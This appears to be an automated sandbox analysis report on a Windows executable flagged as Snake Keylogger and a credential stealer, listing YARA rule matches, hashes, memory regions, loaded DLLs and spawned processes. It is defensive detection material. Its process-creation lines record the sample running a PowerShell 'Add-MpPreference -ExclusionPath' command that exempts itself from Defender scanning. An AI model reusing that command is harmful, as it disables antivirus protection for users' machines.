Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_02DDD55C 0_2_02DDD55C
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07538BD8 0_2_07538BD8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07533470 0_2_07533470
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07532C00 0_2_07532C00
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_075354C8 0_2_075354C8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_075354B8 0_2_075354B8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07530006 0_2_07530006
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07533038 0_2_07533038
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07535090 0_2_07535090
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_03215362 5_2_03215362
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321D278 5_2_0321D278
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_03217118 5_2_03217118
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321C148 5_2_0321C148
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321A088 5_2_0321A088
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321C738 5_2_0321C738
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321C468 5_2_0321C468
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321CA08 5_2_0321CA08
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_032169B0 5_2_032169B0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321E988 5_2_0321E988
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321CFAB 5_2_0321CFAB
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321CCD8 5_2_0321CCD8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321F631 5_2_0321F631
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_03213AA1 5_2_03213AA1
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321FA88 5_2_0321FA88
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0321E97B 5_2_0321E97B
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_032129EC 5_2_032129EC
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_032139EF 5_2_032139EF
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_03213E09 5_2_03213E09
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC1E80 5_2_06FC1E80
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC17A0 5_2_06FC17A0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC0B30 5_2_06FC0B30
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9C70 5_2_06FC9C70
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC5028 5_2_06FC5028
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC2968 5_2_06FC2968
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9548 5_2_06FC9548
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCEAF8 5_2_06FCEAF8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE6B0 5_2_06FCE6B0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE6AF 5_2_06FCE6AF
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE6A0 5_2_06FCE6A0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC1E74 5_2_06FC1E74
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC1E70 5_2_06FC1E70
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE258 5_2_06FCE258
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCE249 5_2_06FCE249
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCDE00 5_2_06FCDE00
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCF3B8 5_2_06FCF3B8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC8BA0 5_2_06FC8BA0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC1798 5_2_06FC1798
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC8B95 5_2_06FC8B95
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC8B90 5_2_06FC8B90
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC178F 5_2_06FC178F
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCEF60 5_2_06FCEF60
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCEF51 5_2_06FCEF51
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9328 5_2_06FC9328
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC0B20 5_2_06FC0B20
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCEB08 5_2_06FCEB08
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD0F8 5_2_06FCD0F8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCCCA0 5_2_06FCCCA0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9C6D 5_2_06FC9C6D
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCFC68 5_2_06FCFC68
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCFC5F 5_2_06FCFC5F
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC0040 5_2_06FC0040
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC5025 5_2_06FC5025
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC001E 5_2_06FC001E
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC501B 5_2_06FC501B
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCF810 5_2_06FCF810
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCF801 5_2_06FCF801
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCDDFE 5_2_06FCDDFE
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD9A8 5_2_06FCD9A8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD999 5_2_06FCD999
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC295B 5_2_06FC295B
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD550 5_2_06FCD550
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9540 5_2_06FC9540
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FCD540 5_2_06FCD540
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0719BE50 5_2_0719BE50
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_07195878 5_2_07195878
Source: NXPYoHNSgv.exe, 00000000.00000002.2158732190.0000000007B8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2152290661.000000000118E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2157761178.0000000007460000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2153199131.0000000002E01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe, 00000005.00000002.4629872184.00000000075A9000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe Binary or memory string: OriginalFilenamejBGm.exe8 vs NXPYoHNSgv.exe
Source: NXPYoHNSgv.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: NXPYoHNSgv.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, aLPFebSbot9WYKQxSZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.SetAccessControl
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.AddAccessRule
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, aLPFebSbot9WYKQxSZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.SetAccessControl
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.AddAccessRule
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.SetAccessControl
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs Security API names: _0020.AddAccessRule
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, aLPFebSbot9WYKQxSZ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/7@4/4
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NXPYoHNSgv.exe.log
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv2p2dje.kec.ps1
Source: NXPYoHNSgv.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NXPYoHNSgv.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: NXPYoHNSgv.exe ReversingLabs: Detection: 60%
Source: NXPYoHNSgv.exe Virustotal: Detection: 39%
Source: unknown Process created: C:\Users\user\Desktop\NXPYoHNSgv.exe "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Users\user\Desktop\NXPYoHNSgv.exe "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Users\user\Desktop\NXPYoHNSgv.exe "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
